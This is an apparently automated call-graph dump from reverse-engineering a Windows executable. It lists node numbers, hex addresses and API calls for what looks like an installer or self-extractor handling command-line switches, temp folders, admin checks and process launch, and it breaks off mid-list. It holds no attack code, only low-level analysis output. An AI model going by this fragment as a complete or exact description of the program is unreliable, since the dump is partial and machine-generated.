9200->9202 9201->9197 9202->9201 9210 409f10 9204->9210 9213 401cfa 9204->9213 9216 40c7e0 9204->9216 9222 40b880 9204->9222 9205 40cd0e ??3@YAXPAX 9205->9092 9211 401d13 free 9210->9211 9212 409f1a 9211->9212 9212->9205 9214 401d01 VirtualFree 9213->9214 9215 401d12 9213->9215 9214->9215 9215->9205 9217 40c805 9216->9217 9218 401d13 free 9217->9218 9219 40c80e 9218->9219 9220 40c830 9219->9220 9221 40c827 ??3@YAXPAX 9219->9221 9220->9205 9221->9220 9223 40b8a6 9222->9223 9224 401d13 free 9223->9224 9225 40b8cc 9224->9225 9225->9205 9227 40cdda ctype 3 API calls 9226->9227 9228 40e21c 9227->9228 9229 40cdda ctype 3 API calls 9228->9229 9230 40e224 9229->9230 9231 40cdda ctype 3 API calls 9230->9231 9232 40e22c 9231->9232 9497 41382f __set_app_type __p__fmode __p__commode 9498 41389e 9497->9498 9499 4138b2 9498->9499 9500 4138a6 __setusermatherr 9498->9500 9509 4139a6 _controlfp 9499->9509 9500->9499 9502 4138b7 _initterm __getmainargs _initterm 9503 41390b GetStartupInfoA 9502->9503 9505 41393f GetModuleHandleA 9503->9505 9510 406d72 _EH_prolog 9505->9510 9509->9502 9513 405721 ?_set_new_handler@@YAP6AHI@ZP6AHI@Z 9510->9513 9868 401d21 GetModuleHandleW CreateWindowExW 9513->9868 9516 406d51 MessageBoxA 9518 406d68 exit _XcptFilter 9516->9518 9517 40575f 9517->9516 9519 405779 9517->9519 9520 401458 2 API calls 9519->9520 9521 4057b0 9520->9521 9522 401458 2 API calls 9521->9522 9523 4057bb 9522->9523 9871 4044c6 9523->9871 9528 4027c2 2 API calls 9529 4057f9 9528->9529 9880 402dd6 9529->9880 9531 405802 9894 4043f8 9531->9894 9535 405821 _wtol 9537 405837 9535->9537 9899 404903 #17 9537->9899 9538 4043f8 3 API calls 9539 405867 9538->9539 9540 4058a1 9539->9540 9541 40586d 9539->9541 9543 4043f8 3 API calls 9540->9543 10129 404e99 9541->10129 9544 4058ac 9543->9544 9546 4058b2 9544->9546 9547 4058bd 9544->9547 9545 405874 ??3@YAXPAX 10146 404513 9545->10146 10151 4052a7 9546->10151 9549 4043f8 3 API calls 9547->9549 9553 4058cc 9549->9553 9551 405885 ??3@YAXPAX ??3@YAXPAX 9551->9518 9552 405901 GetModuleFileNameW 9555 405913 9552->9555 9556 405925 9552->9556 9553->9552 9554 401172 2 API calls 9553->9554 9554->9552 9557 408dbf 57 API calls 9555->9557 9558 4043f8 3 API calls 9556->9558 9563 405872 9557->9563 9570 405947 9558->9570 9559 405ae3 9560 4013a9 2 API calls 9559->9560 9561 405af3 9560->9561 9562 4013a9 2 API calls 9561->9562 9567 405b00 9562->9567 9563->9545 9564 405a05 9564->9563 9565 405a38 9564->9565 9569 405a21 _wtol 9564->9569 9566 4043f8 3 API calls 9565->9566 9578 405a97 9566->9578 9568 405b85 9567->9568 9572 401370 2 API calls 9567->9572 9925 4023a0 9568->9925 9569->9565 9570->9559 9570->9563 9570->9564 9570->9565 9577 401526 2 API calls 9570->9577 9574 405b35 9572->9574 9576 401370 2 API calls 9574->9576 9575 401370 2 API calls 9579 405bab ??2@YAPAXI 9575->9579 9583 405b4b 9576->9583 9577->9570 9578->9559 9580 404a97 2 API calls 9578->9580 9581 405bb7 9579->9581 9582 405ac8 9580->9582 9928 40c9d7 9581->9928 9582->9559 9584 4013a9 2 API calls 9582->9584 9585 4013a9 2 API calls 9583->9585 9584->9559 9586 405b75 9585->9586 9588 402187 19 API calls 9586->9588 9590 405b7c 9588->9590 9593 4027c2 2 API calls 9590->9593 9591 405be4 9594 408dbf 57 API calls 9591->9594 9592 405c0a 9931 402823 9592->9931 9593->9568 9594->9563 9598 405c1f 9599 405c25 9598->9599 9600 405c49 9598->9600 9602 408dbf 57 API calls 9599->9602 9601 405cdb 9600->9601 9604 4043f8 3 API calls 9600->9604 9605 40cdda ctype 3 API calls 9601->9605 9603 405c2d ??3@YAXPAX 9602->9603 9603->9563 9606 405c60 9604->9606 9607 405ce3 9605->9607 9606->9601 9616 405c66 9606->9616 9608 405d08 9607->9608 9965 403400 9607->9965 9610 405d11 9608->9610 9611 405cbf ??3@YAXPAX 9608->9611 9614 405d82 9610->9614 9615 405d1d wsprintfW 9610->9615 9621 401458 2 API calls 9610->9621 9624 401370 ??2@YAPAXI ??3@YAXPAX 9610->9624 9626 402187 19 API calls 9610->9626 10185 4032d9 ??2@YAPAXI 9610->10185 10191 40269a ??3@YAXPAX ??3@YAXPAX 9610->10191 9611->9563 9613 405cfd ??3@YAXPAX 9613->9563 9994 404b06 9614->9994 9618 401458 2 API calls 9615->9618 9616->9611 10159 4054c1 9616->10159 9618->9610 9620 405c95 9620->9611 9622 405c9b 9620->9622 9621->9610 9623 408dbf 57 API calls 9622->9623 9625 405ca3 ??3@YAXPAX 9623->9625 9624->9610 9625->9563 9626->9610 9627 406006 9628 404b06 26 API calls 9627->9628 9629 406015 9628->9629 9631 40619d 9629->9631 10217 40244e AllocateAndInitializeSid 9629->10217 10053 4026b0 9631->10053 9636 40624e 10056 4045f4 9636->10056 9638 40603a 9641 401458 2 API calls 9638->9641 9639 402771 2 API calls 9682 4061b5 9639->9682 9643 406042 9641->9643 9646 401458 2 API calls 9643->9646 9644 4062e1 CoInitialize 9652 4026b0 lstrcmpW 9644->9652 9645 406275 9648 4026b0 lstrcmpW 9645->9648 9649 40604a GetCommandLineW 9646->9649 9651 406284 9648->9651 9653 404a97 2 API calls 9649->9653 9650 406250 ??3@YAXPAX 9650->9636 9654 406294 9651->9654 9658 402187 19 API calls 9651->9658 9655 406307 9652->9655 9656 40605a 9653->9656 10226 4041ab 9654->10226 9659 40631b 9655->9659 9662 401370 2 API calls 9655->9662 9660 402771 2 API calls 9656->9660 9657 401458 ??2@YAPAXI ??3@YAXPAX 9657->9682 9658->9654 9664 4041c4 16 API calls 9659->9664 9663 406065 9660->9663 9662->9659 9668 4048a9 2 API calls 9663->9668 9669 406321 9664->9669 9666 4013a9 2 API calls 9666->9682 9667 40421b lstrlenW lstrlenW _wcsnicmp 9675 405d8b 9667->9675 9671 406083 9668->9671 9672 4026b0 lstrcmpW 9669->9672 9670 407ce8 22 API calls 9673 4062b7 9670->9673 9676 4048c7 2 API calls 9671->9676 9677 406330 9672->9677 10229 407a5b ??3@YAXPAX 9673->10229 9674 401370 2 API calls 9674->9682 9675->9627 9675->9667 9699 405f6a _wtol 9675->9699 9726 40614a ??3@YAXPAX 9675->9726 10192 404d50 9675->10192 10203 40464b 9675->10203 9683 406090 9676->9683 9679 406344 9677->9679 9680 406337 _wtol 9677->9680 9684 40636a 9679->9684 10230 408f81 9679->10230 9680->9679 9681 4062c2 ??3@YAXPAX 9681->9563 9682->9636 9682->9639 9682->9650 9682->9657 9682->9666 9682->9674 9685 4032d9 7 API calls 9682->9685 10225 40269a ??3@YAXPAX ??3@YAXPAX 9682->10225 9686 4048c7 2 API calls 9683->9686 9689 40637e 9684->9689 9691 406355 ??3@YAXPAX 9684->9691 10246 408eb4 9684->10246 9685->9682 9687 40609d 9686->9687 10220 4048e5 9687->10220 9701 401458 2 API calls 9689->9701 9705 406503 ??3@YAXPAX 9689->9705 9706 4063bc GetKeyState 9689->9706 9710 406563 9689->9710 9711 401370 ??2@YAPAXI ??3@YAXPAX 9689->9711 9712 4026b0 lstrcmpW 9689->9712 9718 401526 ??2@YAPAXI ??3@YAXPAX 9689->9718 9727 406520 9689->9727 9729 406553 ??3@YAXPAX ??3@YAXPAX 9689->9729 9730 4064f8 ??3@YAXPAX 9689->9730 10273 408461 9689->10273 10286 4084df 9689->10286 9691->9684 9695 40622b ??3@YAXPAX 9697 4026b0 lstrcmpW 9695->9697 9696 401551 2 API calls 9698 4060b7 9696->9698 9697->9682 9700 4013a9 2 API calls 9698->9700 9699->9675 9703 4060c3 7 API calls 9700->9703 9701->9689 9704 404f67 9 API calls 9703->9704 9707 40610c 9704->9707 9705->9563 9706->9689 9708 406116 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9707->9708 9709 406167 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9707->9709 9708->9563 9709->9545 9709->9563 9713 406599 9710->9713 9714 40656b 9710->9714 9711->9689 9712->9689 9716 40133e 2 API calls 9713->9716 10062 404545 9714->10062 9719 4065a7 9716->9719 9718->9689 9723 4041c4 16 API calls 9719->9723 9722 4013a9 2 API calls 9724 406588 ??3@YAXPAX 9722->9724 9725 4065b0 9723->9725 9734 4065d0 9724->9734 9728 4065c1 ??3@YAXPAX 9725->9728 9732 4013a9 2 API calls 9725->9732 9726->9563 9731 408dbf 57 API calls 9727->9731 9728->9734 9729->9563 9730->9689 9733 40652c ??3@YAXPAX ??3@YAXPAX 9731->9733 9732->9728 9733->9563 9735 40661a 9734->9735 9736 40660d 9734->9736 10294 40851f 9735->10294 10075 40172c ??2@YAPAXI 9736->10075 9739 406616 9740 406657 9739->9740 9741 40662c 9739->9741 9742 4045f4 22 API calls 9740->9742 10302 4044b0 9741->10302 9743 40665c 9742->9743 9746 406c4d 9743->9746 9747 401458 2 API calls 9743->9747 9749 406cc5 9746->9749 9750 4026b0 lstrcmpW 9746->9750 9748 40667a 9747->9748 9793 40668d 9748->9793 10306 404a41 9748->10306 9752 406d08 ??3@YAXPAX ??3@YAXPAX 9749->9752 9758 4026b0 lstrcmpW 9749->9758 9756 406c7e 9750->9756 9753 406d21 9752->9753 9754 406d27 ??3@YAXPAX 9752->9754 9753->9754 9757 404513 4 API calls 9754->9757 9755 401458 ??2@YAPAXI ??3@YAXPAX 9755->9793 9756->9749 10373 404497 9756->10373 9759 406d38 ??3@YAXPAX ??3@YAXPAX 9757->9759 9760 406ce4 9758->9760 9759->9518 9760->9752 9763 406cf1 9760->9763 9767 40133e 2 API calls 9763->9767 9764 4066bc 9768 406ae3 ??3@YAXPAX ??3@YAXPAX 9764->9768 9769 4066c9 9764->9769 9765 4026b0 lstrcmpW 9765->9793 9766 407ce8 22 API calls 9771 406cba 9766->9771 9773 406d00 9767->9773 9772 406bec 9768->9772 9770 4048c7 2 API calls 9769->9770 9774 4066e5 9770->9774 10376 407a5b ??3@YAXPAX 9771->10376 9777 406c44 ??3@YAXPAX 9772->9777 9782 4045f4 22 API calls 9772->9782 10377 405304 9773->10377 9780 4048c7 2 API calls 9774->9780 9775 406729 9781 401370 2 API calls 9775->9781 9777->9746 9784 4066f2 9780->9784 9785 406732 9781->9785 9783 406bfb 9782->9783 10363 404dae 9783->10363 9787 4013a9 2 API calls 9784->9787 9789 4041f8 20 API calls 9785->9789 9792 4066fe ??3@YAXPAX ??3@YAXPAX GetFileAttributesW 9787->9792 9788 406b49 ??3@YAXPAX ??3@YAXPAX 9788->9772 9806 40673b 9789->9806 9790 401370 2 API calls 9790->9793 9791 406c14 SetCurrentDirectoryW 9794 404dae 4 API calls 9791->9794 9795 406725 9792->9795 9796 406afa 9792->9796 9793->9755 9793->9764 9793->9765 9793->9775 9793->9788 9793->9790 9797 401526 2 API calls 9793->9797 9798 406c3c 9794->9798 9795->9775 9799 4044b0 16 API calls 9796->9799 9800 4067c9 ??3@YAXPAX ??3@YAXPAX 9797->9800 9801 4044b0 16 API calls 9798->9801 9802 406aff 9799->9802 9800->9793 9801->9777 9803 408dbf 57 API calls 9802->9803 9804 406b08 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9803->9804 9804->9563 9805 406b3e 9804->9805 9805->9563 9807 406868 _wtol 9806->9807 9808 404255 lstrlenW lstrlenW _wcsnicmp 9806->9808 9809 40692c 9806->9809 9807->9806 9808->9806 9810 406935 9809->9810 9811 406987 9809->9811 9812 40695a 9810->9812 9813 40693b 9810->9813 9814 4013a9 2 API calls 9811->9814 9815 401370 2 API calls 9812->9815 9816 401370 2 API calls 9813->9816 9817 406985 9814->9817 9819 406958 9815->9819 9818 406946 9816->9818 9820 4027c2 2 API calls 9817->9820 9822 4027c2 2 API calls 9818->9822 9821 4026b0 lstrcmpW 9819->9821 9823 406999 9820->9823 9825 40696f 9821->9825 9824 40694f 9822->9824 9826 401458 2 API calls 9823->9826 9827 4027c2 2 API calls 9824->9827 9825->9823 9830 4027c2 2 API calls 9825->9830 9828 4069a1 9826->9828 9827->9819 9829 404a97 2 API calls 9828->9829 9831 4069ae 9829->9831 9830->9817 9832 402771 2 API calls 9831->9832 9833 4069b9 9832->9833 9834 4041f8 20 API calls 9833->9834 9835 4069c2 9834->9835 9836 406a9d 9835->9836 10092 40241d 9835->10092 9837 406bcb ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9836->9837 9839 406ab1 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9836->9839 9837->9772 9839->9768 9840 4069d7 9840->9836 9841 4069f1 9840->9841 9843 4027c2 2 API calls 9840->9843 9842 4041f8 20 API calls 9841->9842 9844 406a09 9842->9844 9843->9841 9845 406a10 9844->9845 9846 406a7f 9844->9846 10101 4048a9 9845->10101 10315 40503e 9846->10315 9850 406a8d 9851 406b68 SetLastError 9850->9851 9852 406a98 9850->9852 9855 406b6f 9851->9855 10360 4023b5 9852->10360 9857 408dbf 57 API calls 9855->9857 9859 406b79 9857->9859 9858 401551 2 API calls 9860 406a45 ??3@YAXPAX ??3@YAXPAX 9858->9860 9861 4044b0 16 API calls 9859->9861 10111 404f67 9860->10111 9863 406b7e 7 API calls 9861->9863 9865 406bbe 9863->9865 9864 406a69 9866 406b60 ??3@YAXPAX 9864->9866 9867 406a77 ??3@YAXPAX 9864->9867 9865->9837 9866->9855 9867->9852 9869 401d56 SetTimer GetMessageW DispatchMessageW KillTimer KiUserCallbackDispatcher 9868->9869 9870 401d89 GetVersionExW 9868->9870 9869->9870 9870->9516 9870->9517 9872 401172 2 API calls 9871->9872 9873 4044db GetCommandLineW 9872->9873 9874 404a97 9873->9874 9875 404ad1 9874->9875 9876 404aa5 9874->9876 9877 404ac9 9875->9877 9878 401526 2 API calls 9875->9878 9876->9877 9879 401526 2 API calls 9876->9879 9877->9528 9878->9875 9879->9876 9881 401458 2 API calls 9880->9881 9887 402de6 9881->9887 9882 402ecc 9883 4013a9 2 API calls 9882->9883 9884 402ed9 ??3@YAXPAX 9883->9884 9884->9531 9885 401526 ??2@YAPAXI ??3@YAXPAX 9885->9887 9887->9882 9887->9885 9888 401458 2 API calls 9887->9888 9890 4013a9 2 API calls 9887->9890 10416 40283b 9887->10416 10419 402ad8 9887->10419 9888->9887 9891 402e46 ??3@YAXPAX 9890->9891 9892 401429 2 API calls 9891->9892 9893 402e5b ??3@YAXPAX ??3@YAXPAX 9892->9893 9893->9887 9895 404407 9894->9895 9896 404421 lstrlenW lstrlenW 9895->9896 9897 404444 9895->9897 10430 401c74 9896->10430 9897->9535 9897->9537 9900 40491a 9899->9900 9901 402131 3 API calls 9900->9901 9902 40491f 9901->9902 9903 402187 19 API calls 9902->9903 9904 404926 9903->9904 9905 402187 19 API calls 9904->9905 9906 404932 9905->9906 9907 402187 19 API calls 9906->9907 9908 40493e 9907->9908 9909 402187 19 API calls 9908->9909 9910 40494a 9909->9910 9911 402187 19 API calls 9910->9911 9912 404956 9911->9912 9913 402187 19 API calls 9912->9913 9914 404962 9913->9914 9915 402187 19 API calls 9914->9915 9921 40496e 9915->9921 9916 404989 SHGetSpecialFolderPathW 9917 4049a3 wsprintfW 9916->9917 9916->9921 9919 401458 2 API calls 9917->9919 9918 404a3c 9918->9538 9919->9921 9920 401458 2 API calls 9920->9921 9921->9916 9921->9918 9921->9920 9923 401370 ??2@YAPAXI ??3@YAXPAX 9921->9923 9924 4032d9 7 API calls 9921->9924 10440 40269a ??3@YAXPAX ??3@YAXPAX 9921->10440 9923->9921 9924->9921 10441 40236f LoadLibraryA GetProcAddress 9925->10441 9927 4023a5 9927->9575 10444 40c9b5 9928->10444 9932 40250f 2 API calls 9931->9932 9933 402837 9932->9933 9934 403c93 9933->9934 9935 40236f 3 API calls 9934->9935 9936 403ca1 9935->9936 9937 402823 2 API calls 9936->9937 9938 403cda 9937->9938 9939 402823 2 API calls 9938->9939 9940 403ce2 9939->9940 9941 402823 2 API calls 9940->9941 9942 403cea 9941->9942 10450 403ba2 9942->10450 9948 403d27 9949 403d80 9948->9949 9951 403ba2 7 API calls 9948->9951 9954 402bee 10 API calls 9948->9954 9958 402989 2 API calls 9948->9958 10496 402953 9948->10496 9950 403ba2 7 API calls 9949->9950 9952 403d96 9950->9952 9951->9948 9953 402bee 10 API calls 9952->9953 9955 403da8 9953->9955 9954->9948 10493 402989 9955->10493 9958->9948 9959 403e1e ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9959->9598 9960 403ba2 7 API calls 9962 403dbe 9960->9962 9961 402bee 10 API calls 9961->9962 9962->9959 9962->9960 9962->9961 9963 402953 2 API calls 9962->9963 9964 402989 2 API calls 9962->9964 9963->9962 9964->9962 9966 402823 2 API calls 9965->9966 9987 403415 9966->9987 9967 4036b4 ??3@YAXPAX 9968 4036eb 9967->9968 9968->9608 9968->9613 9969 401458 ??2@YAPAXI ??3@YAXPAX 9969->9987 9970 402823 2 API calls 9970->9987 9971 4013a9 2 API calls 9972 403486 ??3@YAXPAX ??3@YAXPAX 9971->9972 9973 4036c0 9972->9973 9972->9987 10535 402d30 9973->10535 9977 4036e1 ??3@YAXPAX 9977->9968 9978 403593 strncmp 9979 40357e strncmp 9978->9979 9978->9987 9979->9978 9979->9987 9982 402ad8 ??2@YAPAXI ??3@YAXPAX MultiByteToWideChar 9982->9987 9983 4013a9 2 API calls 9984 403600 ??3@YAXPAX 9983->9984 9986 402dd6 9 API calls 9984->9986 9985 40292b 2 API calls 9985->9979 9988 403611 lstrcmpW 9986->9988 9987->9967 9987->9969 9987->9970 9987->9971 9987->9973 9987->9978 9987->9982 9987->9983 9987->9985 9989 40292b ??2@YAPAXI ??3@YAXPAX 9987->9989 9990 403648 lstrlenW wcsncmp 9987->9990 9992 4032d9 7 API calls 9987->9992 9993 401370 2 API calls 9987->9993 10526 402662 9987->10526 10530 40261a 9987->10530 10534 40269a ??3@YAXPAX ??3@YAXPAX 9987->10534 9988->9987 9989->9987 9990->9987 9992->9987 9993->9987 9995 4026b0 lstrcmpW 9994->9995 9996 404b1f 9995->9996 9997 404b6f 9996->9997 9999 401370 2 API calls 9996->9999 9998 4026b0 lstrcmpW 9997->9998 10000 404b8d 9998->10000 10001 404b36 9999->10001 10003 4026b0 lstrcmpW 10000->10003 10002 402187 19 API calls 10001->10002 10004 404b3d 10002->10004 10005 404ba5 10003->10005 10006 4027c2 2 API calls 10004->10006 10008 4026b0 lstrcmpW 10005->10008 10007 404b46 10006->10007 10009 401370 2 API calls 10007->10009 10010 404bbd 10008->10010 10011 404b5f 10009->10011 10013 4026b0 lstrcmpW 10010->10013 10012 402187 19 API calls 10011->10012 10014 404b66 10012->10014 10015 404bd5 10013->10015 10016 4027c2 2 API calls 10014->10016 10017 404bec 10015->10017 10018 404bdc lstrcmpiW 10015->10018 10016->9997 10019 4026b0 lstrcmpW 10017->10019 10018->10017 10020 404c02 10019->10020 10021 4026b0 lstrcmpW 10020->10021 10022 404c2f 10021->10022 10023 404c3c 10022->10023 10554 4043a6 10022->10554 10025 4026b0 lstrcmpW 10023->10025 10029 404c50 10025->10029 10026 404c70 10028 4026b0 lstrcmpW 10026->10028 10035 404c83 10028->10035 10029->10026 10030 4026b0 lstrcmpW 10029->10030 10558 40434d 10029->10558 10030->10029 10031 404ca3 10032 4026b0 lstrcmpW 10031->10032 10034 404caf 10032->10034 10036 4026b0 lstrcmpW 10034->10036 10035->10031 10037 4026b0 lstrcmpW 10035->10037 10562 40437e 10035->10562 10038 404cc0 10036->10038 10037->10035 10039 4026b0 lstrcmpW 10038->10039 10040 404cd1 10039->10040 10041 404ce7 10040->10041 10042 404cde _wtol 10040->10042 10043 4026b0 lstrcmpW 10041->10043 10042->10041 10044 404cf3 10043->10044 10045 404d03 10044->10045 10046 404cfa _wtol 10044->10046 10047 4026b0 lstrcmpW 10045->10047 10046->10045 10048 404d0f 10047->10048 10049 4026b0 lstrcmpW 10048->10049 10050 404d27 10049->10050 10051 4026b0 lstrcmpW 10050->10051 10052 404d3f 10051->10052 10052->9675 10054 40261a lstrcmpW 10053->10054 10055 4026c1 10054->10055 10055->9682 10057 404648 10056->10057 10059 404605 10056->10059 10057->9644 10057->9645 10058 40133e 2 API calls 10058->10059 10059->10058 10060 4041f8 20 API calls 10059->10060 10061 404622 SetEnvironmentVariableW ??3@YAXPAX 10060->10061 10061->10057 10061->10059 10063 401458 2 API calls 10062->10063 10064 404556 10063->10064 10065 4027aa 2 API calls 10064->10065 10066 40455f GetTempPathW 10065->10066 10067 404578 10066->10067 10072 40458f 10066->10072 10068 4027aa 2 API calls 10067->10068 10069 404583 GetTempPathW 10068->10069 10069->10072 10070 4027aa 2 API calls 10071 4045b2 wsprintfW 10070->10071 10071->10072 10072->10070 10073 4045c9 GetFileAttributesW 10072->10073 10074 4045ed 10072->10074 10073->10072 10073->10074 10074->9722 10076 401745 10075->10076 10091 40d041 3 API calls 10076->10091 10077 401769 10078 401794 10077->10078 10570 40110a 10077->10570 10080 408dbf 57 API calls 10078->10080 10084 40179c 10080->10084 10082 4017bc 10083 4017d4 ??2@YAPAXI 10082->10083 10085 4036f1 88 API calls 10082->10085 10086 4017e0 10083->10086 10087 4017e7 10083->10087 10084->9739 10088 4017cf 10085->10088 10593 401470 10086->10593 10574 401611 10087->10574 10088->10083 10088->10084 10091->10077 10093 402426 10092->10093 10094 40242b 10092->10094 10093->9840 10095 40236f 3 API calls 10094->10095 10096 402430 10095->10096 10097 402441 10096->10097 10098 40243a 10096->10098 10097->9840 11011 4023e9 LoadLibraryA GetProcAddress 10098->11011 10102 4044c6 2 API calls 10101->10102 10103 4048b7 10102->10103 10104 401429 2 API calls 10103->10104 10105 4048c2 10104->10105 10106 4048c7 10105->10106 10107 40133e 2 API calls 10106->10107 10108 4048d5 10107->10108 10109 4027c2 2 API calls 10108->10109 10110 4048e0 10109->10110 10110->9858 10112 401458 2 API calls 10111->10112 10113 404f78 10112->10113 10114 401458 2 API calls 10113->10114 10115 404f80 memset 10114->10115 10116 404fae 10115->10116 10117 404a97 2 API calls 10116->10117 10118 404fd1 10117->10118 10119 401370 2 API calls 10118->10119 10120 404fdc 10119->10120 10121 404fe1 ??3@YAXPAX 10120->10121 10122 404ffa ShellExecuteExW 10120->10122 10123 404fec ??3@YAXPAX 10121->10123 10124 405014 10122->10124 10125 40503a 10122->10125 10123->9864 10126 405028 CloseHandle 10124->10126 10127 40501d WaitForSingleObject 10124->10127 10128 405031 ??3@YAXPAX 10125->10128 10126->10128 10127->10126 10128->10123 10130 407c87 4 API calls 10129->10130 10131 404eb5 10130->10131 10132 402187 19 API calls 10131->10132 10133 404ec3 10132->10133 10134 402771 2 API calls 10133->10134 10135 404ecd 10134->10135 10136 404f03 wsprintfW 10135->10136 10138 4027c2 ??2@YAPAXI ??3@YAXPAX 10135->10138 10137 4027c2 2 API calls 10136->10137 10139 404f31 10137->10139 10138->10135 10140 4027c2 2 API calls 10139->10140 10141 404f3e 10140->10141 10142 407ce8 22 API calls 10141->10142 10143 404f53 ??3@YAXPAX 10142->10143 11013 407a5b ??3@YAXPAX 10143->11013 10145 404f64 10145->9563 10147 40cdda ctype 3 API calls 10146->10147 10148 404521 10147->10148 10149 40ccfd ctype 3 API calls 10148->10149 10150 40ce45 ??3@YAXPAX 10149->10150 10150->9551 10152 4052b4 10151->10152 10158 4052d0 10151->10158 10155 4052c6 _wtol 10152->10155 10152->10158 10153 404f67 9 API calls 10154 4052f3 10153->10154 10156 405301 10154->10156 10157 4052fb GetLastError 10154->10157 10155->10158 10156->9563 10157->10156 10158->10153 10160 40ca5c 2 API calls 10159->10160 10161 4054ed 10160->10161 10162 405549 10161->10162 10164 402771 2 API calls 10161->10164 10163 402823 2 API calls 10162->10163 10165 405551 10163->10165 10170 4054fc 10164->10170 10166 4028b9 2 API calls 10165->10166 10167 40555e 10166->10167 10168 402953 2 API calls 10167->10168 10172 40556b 10168->10172 10169 4055ba ??3@YAXPAX 10175 4055b6 10169->10175 10170->10169 10171 4036f1 88 API calls 10170->10171 10173 405520 10171->10173 10174 402953 2 API calls 10172->10174 10173->10169 10177 40ca5c 2 API calls 10173->10177 10176 405578 10174->10176 10175->9620 10178 402953 2 API calls 10176->10178 10180 40553c 10177->10180 10179 405585 10178->10179 10181 40d0a5 2 API calls 10179->10181 10180->10169 10182 405540 ??3@YAXPAX 10180->10182 10183 405599 10181->10183 10182->10162 10183->10169 10184 4055a2 ??3@YAXPAX 10183->10184 10184->10175 10186 4032e8 10185->10186 10188 4032f3 10185->10188 11014 4029b7 10186->11014 10189 4107a2 4 API calls 10188->10189 10190 4032ff 10189->10190 10190->9610 10191->9610 10193 402771 2 API calls 10192->10193 10194 404d62 10193->10194 10195 4027c2 2 API calls 10194->10195 10196 404d6f 10195->10196 10197 404d8b 10196->10197 10198 401526 2 API calls 10196->10198 10199 4027c2 2 API calls 10197->10199 10198->10196 10200 404d95 10199->10200 10201 40464b 94 API calls 10200->10201 10202 404da0 ??3@YAXPAX 10201->10202 10202->9675 10204 404662 lstrlenW 10203->10204 10205 40468e 10203->10205 10206 401c74 CharUpperW 10204->10206 10205->9675 10207 404678 10206->10207 10207->10204 10207->10205 10208 404695 10207->10208 10209 402771 2 API calls 10208->10209 10212 40469e 10209->10212 11019 402b20 10212->11019 10213 403400 87 API calls 10214 40470c 10213->10214 10215 404716 ??3@YAXPAX ??3@YAXPAX 10214->10215 10216 40472d ??3@YAXPAX ??3@YAXPAX 10214->10216 10215->10205 10216->10205 10218 402491 CheckTokenMembership FreeSid 10217->10218 10219 4024ab 10217->10219 10218->10219 10219->9631 10219->9638 10221 40133e 2 API calls 10220->10221 10222 4048f3 10221->10222 10223 401526 2 API calls 10222->10223 10224 4048fe 10223->10224 10224->9696 10225->9695 10227 407c87 4 API calls 10226->10227 10228 4041b3 10227->10228 10228->9670 10229->9681 10234 409205 10230->10234 10243 408fa0 10230->10243 10231 4026b0 lstrcmpW 10231->10243 10232 407c87 4 API calls 10232->10243 10233 40851f 25 API calls 10233->10243 10234->9691 10235 4084df 25 API calls 10235->10243 10236 408461 25 API calls 10236->10243 10238 4041ab 4 API calls 10238->10243 10240 402187 19 API calls 10240->10243 10241 408dbf 57 API calls 10241->10243 10242 404497 4 API calls 10242->10243 10243->10231 10243->10232 10243->10233 10243->10234 10243->10235 10243->10236 10243->10238 10243->10240 10243->10241 10243->10242 10244 408d52 27 API calls 10243->10244 10245 407ce8 22 API calls 10243->10245 11029 407d62 10243->11029 11033 407a5b ??3@YAXPAX 10243->11033 10244->10243 10245->10243 10247 4026b0 lstrcmpW 10246->10247 10248 408ec8 10247->10248 10249 408ed6 10248->10249 11034 401bdf GetStdHandle WriteFile 10248->11034 10251 408ee9 10249->10251 11035 401bdf GetStdHandle WriteFile 10249->11035 10253 408efe 10251->10253 11036 401bdf GetStdHandle WriteFile 10251->11036 10257 408f0f 10253->10257 11037 401bdf GetStdHandle WriteFile 10253->11037 10256 4026b0 lstrcmpW 10258 408f1c 10256->10258 10257->10256 10259 408f2a 10258->10259 11038 401bdf GetStdHandle WriteFile 10258->11038 10260 4026b0 lstrcmpW 10259->10260 10262 408f37 10260->10262 10263 408f45 10262->10263 11039 401bdf GetStdHandle WriteFile 10262->11039 10265 4026b0 lstrcmpW 10263->10265 10266 408f52 10265->10266 10267 408f60 10266->10267 11040 401bdf GetStdHandle WriteFile 10266->11040 10269 4026b0 lstrcmpW 10267->10269 10270 408f6d 10269->10270 10271 408f7d 10270->10271 11041 401bdf GetStdHandle WriteFile 10270->11041 10271->9684 10274 408484 10273->10274 10275 4084b7 10274->10275 10276 408499 10274->10276 11045 407e6c 10275->11045 11042 407e3a 10276->11042 10281 407ce8 22 API calls 10283 4084b2 10281->10283 10282 407ce8 22 API calls 10282->10283 11048 407a5b ??3@YAXPAX 10283->11048 10285 4084da 10285->9689 10287 4084f4 10286->10287 10288 407e53 4 API calls 10287->10288 10289 4084ff 10288->10289 10290 407ce8 22 API calls 10289->10290 10291 408510 10290->10291 11052 407a5b ??3@YAXPAX 10291->11052 10293 40851a 10293->9689 10295 408532 10294->10295 11053 407e85 10295->11053 10298 407ce8 22 API calls 10299 408567 10298->10299 11056 407a5b ??3@YAXPAX 10299->11056 10301 408571 10301->9739 10303 4044c4 ??3@YAXPAX ??3@YAXPAX 10302->10303 10304 4044b9 10302->10304 10303->9563 10305 402ff3 16 API calls 10304->10305 10305->10303 10307 4026b0 lstrcmpW 10306->10307 10308 404a60 10307->10308 10309 404a95 10308->10309 10310 401370 2 API calls 10308->10310 10309->9793 10311 404a6f 10310->10311 10312 4041f8 20 API calls 10311->10312 10313 404a75 10312->10313 10313->10309 10314 401526 2 API calls 10313->10314 10314->10309 10316 401458 2 API calls 10315->10316 10317 405053 10316->10317 10318 401458 2 API calls 10317->10318 10319 40505b GetCommandLineW 10318->10319 10320 404a97 2 API calls 10319->10320 10321 40506b 10320->10321 10322 4048a9 2 API calls 10321->10322 10323 40509e 10322->10323 10324 4048c7 2 API calls 10323->10324 10325 4050ab 10324->10325 10326 4048c7 2 API calls 10325->10326 10327 4050b8 10326->10327 10328 4048e5 2 API calls 10327->10328 10329 4050c5 10328->10329 10330 4048e5 2 API calls 10329->10330 10331 4050d2 10330->10331 10332 4048e5 2 API calls 10331->10332 10333 4050df 10332->10333 10334 4048e5 2 API calls 10333->10334 10335 4050ec 10334->10335 10336 4048c7 2 API calls 10335->10336 10337 